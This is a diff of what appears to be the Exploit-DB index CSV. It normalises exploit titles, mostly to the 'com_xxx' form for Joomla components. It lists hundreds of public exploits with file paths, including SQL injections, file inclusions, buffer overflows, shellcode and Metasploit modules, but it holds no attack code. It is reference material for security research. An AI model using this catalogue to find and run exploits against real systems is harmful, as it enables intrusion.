+17553,platforms/php/webapps/17553.txt,"Joomla! Component 'com_rsappt_pro2' - Local File Inclusion",2011-07-20,"Don Tukulesto",php,webapps,0
 17554,platforms/php/webapps/17554.txt,"Mevin Basic PHP Events Lister 2.03 - Cross-Site Request Forgery",2011-07-21,Crazy_Hacker,php,webapps,0
 17548,platforms/windows/remote/17548.rb,"Freefloat FTP Server - 'REST' Buffer Overflow (Metasploit)",2011-07-19,KaHPeSeSe,windows,remote,0
 17549,platforms/multiple/dos/17549.txt,"Lotus Domino SMTP Router & Email Server and Client - Denial of Service",2011-07-19,Unknown,multiple,dos,0
 17550,platforms/windows/remote/17550.py,"Freefloat FTP Server 1.0 - 'ACCL' Buffer Overflow",2011-07-19,mortis,windows,remote,0
 17551,platforms/jsp/webapps/17551.txt,"Oracle Sun GlassFish Enterprise Server - Persistent Cross-Site Scripting",2011-07-20,"Sense of Security",jsp,webapps,0
 17555,platforms/php/webapps/17555.txt,"vBulletin 4.0.x 4.1.3 - (messagegroupid) SQL Injection",2011-07-21,fb1h2s,php,webapps,0
-17556,platforms/php/webapps/17556.txt,"Joomla! Component JE K2 Story Submit - Local File Inclusion",2011-07-21,v3n0m,php,webapps,0
+17556,platforms/php/webapps/17556.txt,"Joomla! 
Component 'com_jesubmit' - Local File Inclusion",2011-07-21,v3n0m,php,webapps,0
 17557,platforms/windows/remote/17557.html,"Dell IT Assistant - detectIESettingsForITA.ocx ActiveX Control",2011-07-21,rgod,windows,remote,0
 17559,platforms/lin_x86/shellcode/17559.c,"Linux/x86 - egghunt Shellcode (29 bytes)",2011-07-21,"Ali Raheem",lin_x86,shellcode,0
-17560,platforms/php/webapps/17560.txt,"Joomla! Component mod_spo - SQL Injection",2011-07-21,SeguridadBlanca,php,webapps,0
+17560,platforms/php/webapps/17560.txt,"Joomla! Component 'mod_spo' - SQL Injection",2011-07-21,SeguridadBlanca,php,webapps,0
 17561,platforms/windows/local/17561.c,"Kingsoft AntiVirus 2012 'KisKrnl.sys' 2011.7.8.913 - Local Kernel Mode Privilege Escalation",2011-07-22,MJ0011,windows,local,0
 17562,platforms/php/webapps/17562.php,"ExtCalendar2 - (Authentication Bypass/Cookie) SQL Injection",2011-07-23,Lagripe-Dz,php,webapps,0
 17563,platforms/windows/local/17563.py,"Download Accelerator plus (DAP) 9.7 - M3U File Buffer Overflow (Unicode SEH)",2011-07-23,"C4SS!0 G0M3S",windows,local,0
@@ -15284,7 +15284,7 @@ id,file,description,date,author,platform,type,port
 17575,platforms/windows/remote/17575.txt,"Apple Safari 5.0.5 - SVG Remote Code Execution (DEP Bypass)",2011-07-26,Abysssec,windows,remote,0
 17577,platforms/cgi/webapps/17577.txt,"SWAT Samba Web Administration Tool - Cross-Site Request Forgery (PoC)",2011-07-27,"Narendra Shinde",cgi,webapps,0
 17578,platforms/windows/remote/17578.txt,"MinaliC WebServer 2.0 - Remote Source Disclosure",2011-07-27,X-h4ck,windows,remote,0
-17579,platforms/php/webapps/17579.rb,"Joomla! Component com_virtuemart 1.5 / 1.1.7 - Blind Time-Based SQL Injection (Metasploit)",2011-07-28,TecR0c,php,webapps,0
+17579,platforms/php/webapps/17579.rb,"Joomla! Component 'com_virtuemart' 1.5 / 1.1.7 - Blind Time-Based SQL Injection (Metasploit)",2011-07-28,TecR0c,php,webapps,0
 17580,platforms/windows/dos/17580.py,"MyWebServer 1.0.3 - Denial of Service",2011-07-28,X-h4ck,windows,dos,0
 17581,platforms/windows/remote/17581.txt,"MyWebServer 1.0.3 - Arbitrary File Download",2011-07-28,X-h4ck,windows,remote,0
 17582,platforms/windows/dos/17582.txt,"Citrix XenApp / XenDesktop - Stack Based Buffer Overflow",2011-07-28,"n.runs AG",windows,dos,0
@@ -15294,7 +15294,7 @@ id,file,description,date,author,platform,type,port
 17587,platforms/php/webapps/17587.txt,"Link Station Pro - Multiple Vulnerabilities",2011-07-30,"$#4d0\/\/[r007k17]",php,webapps,0
 17588,platforms/windows/remote/17588.rb,"Actfax FTP Server 4.27 - USER Command Stack Buffer Overflow (Metasploit)",2011-07-31,mr_me,windows,remote,0
 17590,platforms/php/webapps/17590.txt,"Digital Scribe 1.5 - (register_form()) Multiple POST Cross-Site Scripting Vulnerabilities",2011-07-31,LiquidWorm,php,webapps,0
-17591,platforms/php/webapps/17591.txt,"Joomla! Component com_obSuggest - Local File Inclusion",2011-07-31,v3n0m,php,webapps,0
+17591,platforms/php/webapps/17591.txt,"Joomla! Component 'com_obSuggest' - Local File Inclusion",2011-07-31,v3n0m,php,webapps,0
 17592,platforms/php/webapps/17592.txt,"CMSPro! 2.08 - Cross-Site Request Forgery",2011-08-01,Xadpritox,php,webapps,0
 17593,platforms/php/webapps/17593.txt,"ZoneMinder 1.24.3 - Remote File Inclusion",2011-08-01,iye,php,webapps,0
 17595,platforms/php/webapps/17595.txt,"MyBB MyTabs Plugin - SQL Injection",2011-08-02,"AutoRUN and dR.sqL",php,webapps,0
@@ -15303,7 +15303,7 @@ id,file,description,date,author,platform,type,port
 17600,platforms/windows/local/17600.rb,"Zinf Audio Player 2.2.1 - '.pls' Buffer Overflow (DEP Bypass)",2011-08-03,"C4SS!0 and h1ch4m",windows,local,0
 17601,platforms/windows/dos/17601.py,"Omnicom Alpha 4.0e LPD Server - Denial of Service",2011-08-03,"Craig Freyman",windows,dos,0
 17602,platforms/php/webapps/17602.txt,"WordPress Plugin TimThumb 1.32 - Remote Code Execution",2011-08-03,MaXe,php,webapps,0
-17603,platforms/php/webapps/17603.txt,"Joomla! Component com_jdirectory - SQL Injection",2011-08-03,"Caddy Dz",php,webapps,0
+17603,platforms/php/webapps/17603.txt,"Joomla! Component 'com_jdirectory' - SQL Injection",2011-08-03,"Caddy Dz",php,webapps,0
 17604,platforms/windows/local/17604.rb,"ABBS Audio Media Player 3.0 - Buffer Overflow (Metasploit)",2011-08-04,"James Fitts",windows,local,0
 17605,platforms/windows/local/17605.rb,"ABBS Electronic Flashcards 2.1 - Buffer Overflow (Metasploit)",2011-08-04,"James Fitts",windows,local,0
 17606,platforms/multiple/webapps/17606.txt,"DZYGroup CMS Portal - Multiple SQL Injections",2011-08-04,Netrondoank,multiple,webapps,0
@@ -15337,7 +15337,7 @@ id,file,description,date,author,platform,type,port
 17643,platforms/windows/dos/17643.pl,"Excel - SLYK Format Parsing Buffer Overrun (PoC)",2011-08-09,webDEViL,windows,dos,0
 17644,platforms/php/webapps/17644.txt,"FCKEditor Core - (FileManager test.html) Arbitrary File Upload (2)",2011-08-09,pentesters.ir,php,webapps,0
 17645,platforms/hardware/remote/17645.py,"iphone/ipad phone drive 1.1.1 - Directory Traversal",2011-08-09,"Khashayar Fereidani",hardware,remote,0
-17646,platforms/php/webapps/17646.txt,"Joomla! Component TNR Enhanced Joomla! Search - SQL Injection",2011-08-09,NoGe,php,webapps,0
+17646,platforms/php/webapps/17646.txt,"Joomla! Component 'com_esearch' - SQL Injection",2011-08-09,NoGe,php,webapps,0
 17647,platforms/windows/local/17647.rb,"A-PDF All to MP3 2.3.0 - Universal DEP Bypass",2011-08-10,"C4SS!0 G0M3S",windows,local,0
 17648,platforms/linux/remote/17648.sh,"HP Data Protector (Linux) - Remote Root Shell",2011-08-10,SZ,linux,remote,0
 17649,platforms/windows/remote/17649.py,"BisonWare BisonFTP Server 3.5 - Remote Buffer Overflow",2011-08-10,localh0t,windows,remote,0
@@ -15358,7 +15358,7 @@ id,file,description,date,author,platform,type,port
 17669,platforms/windows/remote/17669.py,"Simple HTTPd 1.42 - PUT Request Remote Buffer Overflow",2011-08-15,nion,windows,remote,0
 17672,platforms/windows/remote/17672.html,"Mozilla Firefox 3.6.16 - mChannel Object Use-After-Free Exploit (Windows 7)",2011-08-16,mr_me,windows,remote,0
 17673,platforms/php/webapps/17673.txt,"WordPress Plugin IP-Logger 3.0 - SQL Injection",2011-08-16,"Miroslav Stampar",php,webapps,0
-17674,platforms/php/webapps/17674.txt,"Joomla! Component JoomTouch - Local File Inclusion",2011-08-17,NoGe,php,webapps,0
+17674,platforms/php/webapps/17674.txt,"Joomla! Component 'com_joomtouch' - Local File Inclusion",2011-08-17,NoGe,php,webapps,0
 17675,platforms/php/webapps/17675.txt,"SoftwareDEP Classified Script 2.5 - SQL Injection",2011-08-17,v3n0m,php,webapps,0
 17676,platforms/windows/dos/17676.py,"Notepad++ NppFTP plugin - LIST command Remote Heap Overflow (PoC)",2011-08-17,0in,windows,dos,0
 17677,platforms/php/webapps/17677.txt,"WordPress Plugin File Groups 1.1.2 - SQL Injection",2011-08-17,"Miroslav Stampar",php,webapps,0
@@ -15412,9 +15412,9 @@ id,file,description,date,author,platform,type,port
 17731,platforms/php/webapps/17731.txt,"WordPress Plugin Photoracer 1.0 - Multiple Vulnerabilities",2011-08-27,"Yakir Wizman",php,webapps,0
 17732,platforms/windows/local/17732.py,"Free MP3 CD Ripper 1.1 - DEP Bypass",2011-08-27,"C4SS!0 G0M3S",windows,local,0
 17733,platforms/asp/webapps/17733.txt,"Ferdows CMS Pro 1.1.0 - Multiple Vulnerabilities",2011-08-28,"AmnPardaz ",asp,webapps,0
-17734,platforms/php/webapps/17734.txt,"Joomla! Extension JCE 2.0.10 - Multiple Vulnerabilities",2011-08-28,"AmnPardaz ",php,webapps,0
+17734,platforms/php/webapps/17734.txt,"Joomla! Component 'com_jce' 2.0.10 - Multiple Vulnerabilities",2011-08-28,"AmnPardaz ",php,webapps,0
 17735,platforms/windows/local/17735.pl,"Yahoo! player 1.5 - '.m3u' Universal Buffer Overflow (SEH)",2011-08-28,"D3r K0n!G",windows,local,0
-17736,platforms/php/webapps/17736.txt,"Joomla! Component simple file lister module 1.0 - Directory Traversal",2011-08-28,evilsocket,php,webapps,0
+17736,platforms/php/webapps/17736.txt,"Joomla! Component 'mod_simpleFileLister' 1.0 - Directory Traversal",2011-08-28,evilsocket,php,webapps,0
 17737,platforms/php/webapps/17737.txt,"WordPress Plugin Facebook Promotions 1.3.3 - SQL Injection",2011-08-28,"Miroslav Stampar",php,webapps,0
 17738,platforms/php/webapps/17738.txt,"WordPress Plugin Evarisk 5.1.3.6 - SQL Injection",2011-08-28,"Miroslav Stampar",php,webapps,0
 17739,platforms/php/webapps/17739.txt,"WordPress Plugin Profiles 2.0 RC1 - SQL Injection",2011-08-28,"Miroslav Stampar",php,webapps,0
@@ -15587,7 +15587,7 @@ id,file,description,date,author,platform,type,port
 17931,platforms/windows/dos/17931.txt,"genstat 14.1.0.5943 - Multiple Vulnerabilities",2011-10-04,"Luigi Auriemma",windows,dos,0
 17932,platforms/linux/local/17932.c,"PolicyKit polkit-1 <= 0.101 - Linux Privilege Escalation",2011-10-05,zx2c4,linux,local,0
 17933,platforms/windows/dos/17933.html,"DivX Plus Web Player - 'file://' Buffer Overflow (PoC)",2011-10-05,Snake,windows,dos,0
-18033,platforms/php/webapps/18033.txt,"Joomla! Component YJ Contact us - Local File Inclusion",2011-10-25,MeGo,php,webapps,0
+18033,platforms/php/webapps/18033.txt,"Joomla! Component 'com_yjcontactus' - Local File Inclusion",2011-10-25,MeGo,php,webapps,0
 17935,platforms/php/webapps/17935.txt,"tsmim Lessons Library - 'show.php' SQL Injection",2011-10-06,M.Jock3R,php,webapps,0
 17936,platforms/windows/remote/17936.rb,"Opera 10/11 - (bad nesting with frameset tag) Memory Corruption (Metasploit)",2011-10-06,"Jose A. Vazquez",windows,remote,0
 17937,platforms/php/webapps/17937.txt,"URL Shortener Script 1.0 - SQL Injection",2011-10-07,M.Jock3R,php,webapps,0
@@ -15597,7 +15597,7 @@ id,file,description,date,author,platform,type,port
 17941,platforms/linux/webapps/17941.rb,"Spreecommerce 0.60.1 - Arbitrary Command Execution (Metasploit)",2011-10-07,Metasploit,linux,webapps,0
 17942,platforms/linux/local/17942.c,"pkexec - Race Condition Privilege Escalation",2011-10-08,xi4oyu,linux,local,0
 17943,platforms/php/webapps/17943.txt,"BOOKSolved 1.2.2 - Remote File Disclosure",2011-10-08,bd0rk,php,webapps,0
-17944,platforms/php/webapps/17944.txt,"Joomla! Component Time Returns (com_timereturns) 2.0 - SQL Injection",2011-10-08,kaMtiEz,php,webapps,0
+17944,platforms/php/webapps/17944.txt,"Joomla! Component 'com_timereturns' 2.0 - SQL Injection",2011-10-08,kaMtiEz,php,webapps,0
 17946,platforms/php/webapps/17946.txt,"NexusPHP 1.5 - SQL Injection",2011-10-08,flyh4t,php,webapps,0
 17947,platforms/php/webapps/17947.rb,"Snortreport - nmap.php and nbtscan.php Remote Command Execution (Metasploit)",2011-10-09,Metasploit,php,webapps,0
 17948,platforms/windows/remote/17948.rb,"ScriptFTP 3.3 - Remote Buffer Overflow (LIST) (2)",2011-10-09,Metasploit,windows,remote,0
@@ -15669,7 +15669,7 @@ id,file,description,date,author,platform,type,port
 18023,platforms/php/dos/18023.java,"phpLDAPadmin 0.9.4b - Denial of Service",2011-10-23,Alguien,php,dos,0
 18024,platforms/windows/dos/18024.txt,"Win32k - Null Pointer De-reference PoC (MS11-077)",2011-10-23,KiDebug,windows,dos,0
 18025,platforms/multiple/dos/18025.txt,"Google Chrome - Denial of Service",2011-10-23,"Prashant Uniyal",multiple,dos,0
-18042,platforms/php/webapps/18042.txt,"Joomla! Component Techfolio 1.0 - SQL Injection",2011-10-28,"Chris Russell",php,webapps,0
+18042,platforms/php/webapps/18042.txt,"Joomla! Component 'com_techfolio' 1.0 - SQL Injection",2011-10-28,"Chris Russell",php,webapps,0
 18043,platforms/windows/dos/18043.py,"GFI Faxmaker Fax Viewer 10.0 (build 237) - Denial of Service (PoC)",2011-10-28,loneferret,windows,dos,0
 40298,platforms/windows/dos/40298.py,"Goron WebServer 2.0 - Multiple Vulnerabilities",2016-08-29,"Guillaume Kaddouch",windows,dos,80
 18046,platforms/php/webapps/18046.txt,"Joomla! Component Barter Sites 1.3 - Multiple Vulnerabilities",2011-10-29,"Chris Russell",php,webapps,0
@@ -15686,17 +15686,17 @@ id,file,description,date,author,platform,type,port
 18038,platforms/windows/local/18038.rb,"GTA SA-MP server.cfg - Buffer Overflow (Metasploit)",2011-10-26,Metasploit,windows,local,0
 18039,platforms/php/webapps/18039.txt,"WordPress Plugin wptouch - SQL Injection",2011-10-27,longrifle0x,php,webapps,0
 18045,platforms/php/webapps/18045.txt,"PHP Photo Album 0.4.1.16 - Multiple Disclosure Vulnerabilities",2011-10-29,"BHG Security Center",php,webapps,0
-18047,platforms/php/webapps/18047.txt,"Joomla! Component JEEMA Sms 3.2 - Multiple Vulnerabilities",2011-10-29,"Chris Russell",php,webapps,0
-18048,platforms/php/webapps/18048.txt,"Joomla! Component Vik Real Estate 1.0 - Multiple Vulnerabilities",2011-10-29,"Chris Russell",php,webapps,0
+18047,platforms/php/webapps/18047.txt,"Joomla! Component 'com_jeemasms' 3.2 - Multiple Vulnerabilities",2011-10-29,"Chris Russell",php,webapps,0
+18048,platforms/php/webapps/18048.txt,"Joomla! Component 'com_vikrealestate' 1.0 - Multiple Vulnerabilities",2011-10-29,"Chris Russell",php,webapps,0
 18049,platforms/windows/dos/18049.txt,"Microsys PROMOTIC 8.1.4 - ActiveX GetPromoticSite Unitialized Pointer",2011-10-13,"Luigi Auriemma",windows,dos,0
-18050,platforms/php/webapps/18050.txt,"Joomla! Component HM-Community com_hmcommunity - Multiple Vulnerabilities",2011-10-31,"599eme Man",php,webapps,0
+18050,platforms/php/webapps/18050.txt,"Joomla! 
Component 'com_hmcommunity' - Multiple Vulnerabilities",2011-10-31,"599eme Man",php,webapps,0
 18051,platforms/windows/remote/18051.txt,"BroadWin Webaccess SCADA/HMI Client - Remote Code Execution",2011-10-31,Snake,windows,remote,0
 18052,platforms/windows/dos/18052.php,"Oracle DataDirect ODBC Drivers - HOST Attribute 'arsqls24.dll' Stack Based Buffer Overflow (PoC)",2011-10-31,rgod,windows,dos,0
 18053,platforms/php/webapps/18053.txt,"WordPress Theme classipress 3.1.4 - Persistent Cross-Site Scripting",2011-10-31,"Paul Loftness",php,webapps,0
 18055,platforms/php/webapps/18055.txt,"WordPress Plugin Glossary - SQL Injection",2011-10-31,longrifle0x,php,webapps,0
 18056,platforms/php/webapps/18056.txt,"jbShop - e107 7 CMS Plugin - SQL Injection",2011-10-31,"Robert Cooper",php,webapps,0
 18057,platforms/windows/remote/18057.rb,"NJStar Communicator 3.00 - MiniSMTP Server Remote Exploit (Metasploit)",2011-10-31,"Dillon Beresford",windows,remote,0
-18058,platforms/php/webapps/18058.txt,"Joomla! Component Alameda (com_alameda) 1.0 - SQL Injection",2011-10-31,kaMtiEz,php,webapps,0
+18058,platforms/php/webapps/18058.txt,"Joomla! Component 'com_alameda' 1.0 - SQL Injection",2011-10-31,kaMtiEz,php,webapps,0
 18061,platforms/hardware/webapps/18061.txt,"ZTE ZXDSL 831IIV7.5.0a_Z29_OV - Multiple Vulnerabilities",2011-11-01,"mehdi boukazoula",hardware,webapps,0
 18062,platforms/windows/remote/18062.txt,"Oracle Hyperion Financial Management TList6 - ActiveX Control Remote Code Execution",2011-11-02,rgod,windows,remote,0
 18063,platforms/php/webapps/18063.txt,"BST - BestShopPro (nowosci.php) Multiple Vulnerabilities",2011-11-02,CoBRa_21,php,webapps,0
@@ -15800,7 +15800,7 @@ id,file,description,date,author,platform,type,port
 18188,platforms/windows/dos/18188.txt,"Hillstone Software HS TFTP Server 1.3.2 - Denial of Service",2011-12-02,"SecPod Research",windows,dos,0
 18189,platforms/windows/remote/18189.txt,"Ipswitch TFTP Server 1.0.0.24 - Directory Traversal",2011-12-02,"SecPod Research",windows,remote,0
 18190,platforms/windows/remote/18190.rb,"RhinoSoft Serv-U FTPd Server < 4.2 - Buffer Overflow (Metasploit)",2011-12-02,Metasploit,windows,remote,0
-18192,platforms/php/webapps/18192.txt,"Joomla! Component Jobprofile (com_jobprofile) - SQL Injection",2011-12-02,kaMtiEz,php,webapps,0
+18192,platforms/php/webapps/18192.txt,"Joomla! Component 'com_jobprofile' - SQL Injection",2011-12-02,kaMtiEz,php,webapps,0
 18193,platforms/php/webapps/18193.txt,"WSN Classifieds 6.2.12 / 6.2.18 - Multiple Vulnerabilities",2011-12-02,d3v1l,php,webapps,0
 18200,platforms/windows/dos/18200.txt,"SopCast 3.4.7 - 'sop://' URI Handling Remote Stack Buffer Overflow (PoC)",2011-12-05,LiquidWorm,windows,dos,0
 18195,platforms/windows/local/18195.rb,"CCMPlayer 1.5 - '.m3u' Stack based Buffer Overflow (Metasploit)",2011-12-03,Metasploit,windows,local,0
@@ -15814,7 +15814,7 @@ id,file,description,date,author,platform,type,port
 18208,platforms/php/webapps/18208.rb,"Family Connections CMS - 'less.php' Remote Command Execution (Metasploit)",2011-12-07,Metasploit,php,webapps,0
 18215,platforms/php/webapps/18215.txt,"SourceBans 1.4.8 - SQL Injection / Local File Inclusion Injection",2011-12-07,Havok,php,webapps,0
 18217,platforms/php/webapps/18217.txt,"SantriaCMS - SQL Injection",2011-12-08,Troy,php,webapps,0
-18218,platforms/php/webapps/18218.txt,"Joomla! Component QContacts 1.0.6 - SQL Injection",2011-12-08,Don,php,webapps,0
+18218,platforms/php/webapps/18218.txt,"Joomla! Component 'com_qcontacts' 1.0.6 - SQL Injection",2011-12-08,Don,php,webapps,0
 18210,platforms/php/webapps/18210.txt,"PHP City Portal Script Software - SQL Injection",2011-12-07,Don,php,webapps,0
 18212,platforms/php/webapps/18212.txt,"phpBB MyPage Plugin - SQL Injection",2011-12-07,CrazyMouse,php,webapps,0
 18213,platforms/php/webapps/18213.php,"Traq 2.3 - Authentication Bypass / Remote Code Execution",2011-12-07,EgiX,php,webapps,0
@@ -15842,7 +15842,7 @@ id,file,description,date,author,platform,type,port
 18248,platforms/php/webapps/18248.pl,"mPDF 5.3 - File Disclosure",2011-12-16,ZadYree,php,webapps,0
 18249,platforms/php/webapps/18249.txt,"appRain CMF 0.1.5 - Multiple Web Vulnerabilities",2011-12-19,Vulnerability-Lab,php,webapps,0
 18250,platforms/php/webapps/18250.txt,"DotA OpenStats 1.3.9 - SQL Injection",2011-12-19,HvM17,php,webapps,0
-18251,platforms/php/webapps/18251.txt,"Joomla! Component com_dshop - SQL Injection",2011-12-19,CoBRa_21,php,webapps,0
+18251,platforms/php/webapps/18251.txt,"Joomla! Component 'com_dshop' - SQL Injection",2011-12-19,CoBRa_21,php,webapps,0
 18257,platforms/windows/dos/18257.txt,"IrfanView - '.tiff' Image Processing Buffer Overflow",2011-12-20,"Francis Provencher",windows,dos,0
 18254,platforms/windows/dos/18254.pl,"Free Mp3 Player 1.0 - Local Denial of Service",2011-12-19,JaMbA,windows,dos,0
 18256,platforms/windows/dos/18256.txt,"IrfanView FlashPix PlugIn - Double-Free",2011-12-20,"Francis Provencher",windows,dos,0
@@ -15938,7 +15938,7 @@ id,file,description,date,author,platform,type,port
 18377,platforms/osx/remote/18377.rb,"Mozilla Firefox 3.6.16 - mChannel Use-After-Free (2)",2012-01-17,Metasploit,osx,remote,0
 18378,platforms/linux/dos/18378.c,"Linux 2.6.36 IGMP - Remote Denial of Service",2012-01-17,kingcope,linux,dos,0
 18379,platforms/lin_x86/shellcode/18379.c,"Linux/x86 - Search For php/html Writable Files and Add Your Code Shellcode (380+ bytes)",2012-01-17,rigan,lin_x86,shellcode,0
-18380,platforms/php/webapps/18380.txt,"Joomla! Component Discussions (com_discussions) - SQL Injection",2012-01-17,"Red Security TEAM",php,webapps,0
+18380,platforms/php/webapps/18380.txt,"Joomla! Component 'com_discussions' - SQL Injection",2012-01-17,"Red Security TEAM",php,webapps,0
 18975,platforms/php/webapps/18975.rb,"Log1 CMS - writeInfo() PHP Code Injection (Metasploit)",2012-06-03,Metasploit,php,webapps,0
 18976,platforms/php/dos/18976.php,"PHP 5.3.10 - spl_autoload() Local Denial of Service",2012-06-03,"Yakir Wizman",php,dos,0
 18381,platforms/windows/remote/18381.rb,"HP Easy Printer Care - XMLCacheMgr Class ActiveX Control Remote Code Execution (Metasploit)",2012-01-18,Metasploit,windows,remote,0
@@ -16221,8 +16221,8 @@ id,file,description,date,author,platform,type,port
 18725,platforms/php/webapps/18725.txt,"Dolibarr ERP & CRM - OS Command Injection",2012-04-09,"Nahuel Grisolia",php,webapps,0
 18726,platforms/windows/local/18726.py,"Mini-stream RM-MP3 Converter 3.1.2.2 - Local Buffer Overflow",2012-04-09,"SkY-NeT SySteMs",windows,local,0
 18727,platforms/windows/remote/18727.rb,"IBM Tivoli Provisioning Manager Express for Software Distribution Isig.isigCtl.1 - ActiveX RunAndUploadFile() Method Overflow (Metasploit)",2012-04-10,Metasploit,windows,remote,0
-18728,platforms/php/webapps/18728.txt,"Joomla! Component The Estate Agent (com_estateagent) - SQL Injection",2012-04-10,xDarkSton3x,php,webapps,0
-18729,platforms/php/webapps/18729.txt,"Joomla! Component com_bearleague - SQL Injection",2012-04-10,xDarkSton3x,php,webapps,0
+18728,platforms/php/webapps/18728.txt,"Joomla! Component 'com_estateagent' - SQL Injection",2012-04-10,xDarkSton3x,php,webapps,0
+18729,platforms/php/webapps/18729.txt,"Joomla! Component 'com_bearleague' - SQL Injection",2012-04-10,xDarkSton3x,php,webapps,0
 18732,platforms/php/webapps/18732.txt,"Software DEP Classified Script 2.5 - SQL Injection",2012-04-12,"hordcode security",php,webapps,0
 18733,platforms/linux/local/18733.py,"WICD - Local Privilege Esclation Exploit",2012-04-12,anonymous,linux,local,0
 18734,platforms/hardware/dos/18734.txt,"EMC IRM License Server 4.6.1.1995 - Denial of Service",2012-04-12,"Luigi Auriemma",hardware,dos,0
@@ -16232,7 +16232,7 @@ id,file,description,date,author,platform,type,port
 18738,platforms/php/remote/18738.rb,"V-CMS - Arbitrary .PHP File Upload / Execution (Metasploit)",2012-04-14,Metasploit,php,remote,0
 18739,platforms/windows/dos/18739.txt,"IrfanView FlashPix PlugIn - Decompression Heap Overflow",2012-04-14,"Francis Provencher",windows,dos,0
 18749,platforms/osx/local/18749.py,"Office 2008 sp0 - RTF pFragments MAC Exploit",2012-04-18,"Abhishek Lyall",osx,local,0
-18741,platforms/php/webapps/18741.txt,"Joomla! Component com_ponygallery - SQL Injection",2012-04-15,xDarkSton3x,php,webapps,0
+18741,platforms/php/webapps/18741.txt,"Joomla! Component 'com_ponygallery' - SQL Injection",2012-04-15,xDarkSton3x,php,webapps,0
 18742,platforms/php/webapps/18742.php,"NetworX CMS - Cross-Site Request Forgery (Add Admin)",2012-04-15,N3t.Crack3r,php,webapps,0
 18743,platforms/php/webapps/18743.txt,"MediaXxx Adult Video / Media Script - SQL Injection",2012-04-15,"Daniel Godoy",php,webapps,0
 18745,platforms/multiple/webapps/18745.txt,"ManageEngine Support Center Plus 7903 - Multiple Vulnerabilities",2012-04-15,xistence,multiple,webapps,0
@@ -31073,7 +31073,7 @@ id,file,description,date,author,platform,type,port
 34390,platforms/php/remote/34390.rb,"HybridAuth - install.php PHP Code Execution (Metasploit)",2014-08-21,Metasploit,php,remote,80
 34391,platforms/php/webapps/34391.txt,"Sourcefabric Campsite - Multiple Cross-Site Scripting Vulnerabilities",2010-07-30,"High-Tech Bridge SA",php,webapps,0
 34392,platforms/php/webapps/34392.txt,"MyIT CRM - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2010-08-02,"Juan Manuel Garcia",php,webapps,0
-34393,platforms/php/webapps/34393.txt,"Joomla! Component com_jigsaw - 'Controller' Parameter Directory Traversal",2010-08-03,FL0RiX,php,webapps,0
+34393,platforms/php/webapps/34393.txt,"Joomla! Component 'com_jigsaw' - 'Controller' Parameter Directory Traversal",2010-08-03,FL0RiX,php,webapps,0
 34394,platforms/hardware/dos/34394.pl,"D-Link WBR-2310 1.0.4 - HTTP GET Request Remote Buffer Overflow",2010-08-03,"Rodrigo Escobar",hardware,dos,0
 34395,platforms/windows/dos/34395.pl,"PMSoftware Simple Web Server 2.1 - 'From:' Header Processing Remote Denial Of Service",2010-08-03,"Rodrigo Escobar",windows,dos,0
 34396,platforms/php/webapps/34396.txt,"FuseTalk 3.2/4.0 - Multiple Cross-Site Scripting Vulnerabilities",2010-07-03,"Juan Manuel Garcia",php,webapps,0
@@ -31148,9 +31148,9 @@ id,file,description,date,author,platform,type,port
 34472,platforms/php/webapps/34472.txt,"PHPMass Real Estate - 'view_map.php' Cross-Site Scripting",2009-09-01,Moudi,php,webapps,0
 34473,platforms/php/webapps/34473.txt,"Property Watch - email.php videoid Parameter Cross-Site Scripting",2009-09-01,Moudi,php,webapps,0
 34474,platforms/php/webapps/34474.txt,"Property Watch - 'login.php' redirect Parameter Cross-Site Scripting",2009-09-01,Moudi,php,webapps,0
-34475,platforms/php/webapps/34475.txt,"Joomla! Component com_weblinks - 'Itemid' Parameter SQL Injection",2010-08-15,"ViRuS Qalaa",php,webapps,0
+34475,platforms/php/webapps/34475.txt,"Joomla! Component 'com_weblinks' - 'Itemid' Parameter SQL Injection",2010-08-15,"ViRuS Qalaa",php,webapps,0
 34476,platforms/php/webapps/34476.txt,"Zomplog 3.9 - 'message' Parameter Multiple Cross-Site Scripting Vulnerabilities",2010-08-15,10n1z3d,php,webapps,0
-34477,platforms/php/webapps/34477.txt,"Joomla! Component com_fireboard - 'Itemid' Parameter SQL Injection",2010-08-15,"ViRuS Qalaa",php,webapps,0
+34477,platforms/php/webapps/34477.txt,"Joomla! Component 'com_fireboard' - 'Itemid' Parameter SQL Injection",2010-08-15,"ViRuS Qalaa",php,webapps,0
 34478,platforms/windows/remote/34478.html,"Microsoft Internet Explorer 8 - 'toStaticHTML()' HTML Sanitization Bypass",2010-08-16,"Mario Heiderich",windows,remote,0
 34479,platforms/php/webapps/34479.html,"CMSimple 3.3 - Cross-Site Scripting / Cross-Site Request Forgery",2010-08-16,"High-Tech Bridge SA",php,webapps,0
 34480,platforms/windows/dos/34480.py,"Xilisoft Video Converter 3.1.8.0720b - '.ogg' Buffer Overflow",2010-08-16,"Praveen Darshanam",windows,dos,0
@@ -31158,7 +31158,7 @@ id,file,description,date,author,platform,type,port
 40339,platforms/linux/remote/40339.py,"glibc - getaddrinfo Stack Based Buffer Overflow (2)",2016-09-06,SpeeDr00t,linux,remote,0
 34482,platforms/php/webapps/34482.txt,"TurnkeyForms Yahoo Answers Clone - 'questiondetail.php' Cross-Site Scripting",2009-08-10,Moudi,php,webapps,0
 34483,platforms/php/webapps/34483.txt,"Nasim Guest Book - 'page' Parameter Cross-Site Scripting",2010-08-10,Moudi,php,webapps,0
-34484,platforms/php/webapps/34484.txt,"Joomla! Component com_dirfrm - Multiple SQL Injections",2010-08-18,Hieuneo,php,webapps,0
+34484,platforms/php/webapps/34484.txt,"Joomla! Component 'com_dirfrm' - Multiple SQL Injections",2010-08-18,Hieuneo,php,webapps,0
 34485,platforms/php/webapps/34485.txt,"FreeSchool - 'key_words' Parameter Cross-Site Scripting",2009-10-14,"drunken danish rednecks",php,webapps,0
 34486,platforms/php/webapps/34486.txt,"phpCMS 2008 - 'download.php' Information Disclosure",2009-10-19,Securitylab.ir,php,webapps,0
 34487,platforms/php/webapps/34487.txt,"Facil Helpdesk - kbase/kbase.php URI Cross-Site Scripting",2009-08-07,Moudi,php,webapps,0
@@ -31194,7 +31194,7 @@ id,file,description,date,author,platform,type,port
 34525,platforms/multiple/webapps/34525.txt,"Syslog LogAnalyzer 3.6.5 - Persistent Cross-Site Scripting (Python Exploit)",2014-09-02,"Dolev Farhi",multiple,webapps,0
 34637,platforms/php/webapps/34637.txt,"Joomla! Component 'com_formmaker' 3.4 - SQL Injection",2014-09-12,"Claudio Viviani",php,webapps,0
 34532,platforms/windows/remote/34532.c,"Bloodshed Dev-C++ 4.9.9.2 - Multiple EXE Loading Arbitrary Code Execution",2010-08-25,storm,windows,remote,0
